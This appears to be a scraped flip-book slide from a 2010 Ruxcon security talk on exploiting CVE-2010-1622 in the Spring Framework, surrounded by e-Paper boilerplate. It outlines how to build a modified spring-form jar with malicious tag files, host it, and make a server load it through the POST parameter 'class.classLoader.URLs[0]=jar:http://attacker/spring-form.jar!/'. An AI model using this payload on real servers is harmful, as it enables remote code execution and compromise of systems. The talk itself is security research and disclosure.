view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon
view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon
view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon
- No tags were found...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
CVE-<strong>2010</strong>-1622 exploitDownload org.springframework.web.servlet-X.X.X.RELEASE.jarEdit spring-form.tld and add tag file definitions for all tags. Example for tag:input/META-INF/tags/InputTag.tagCreate corresponding tag files, e.g. InputTag.tag:Bundle everything back into spring-form.jar and put it up onlineSubmit POST request to a form controller with the following parameter:class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/Thursday, November 25, <strong>2010</strong>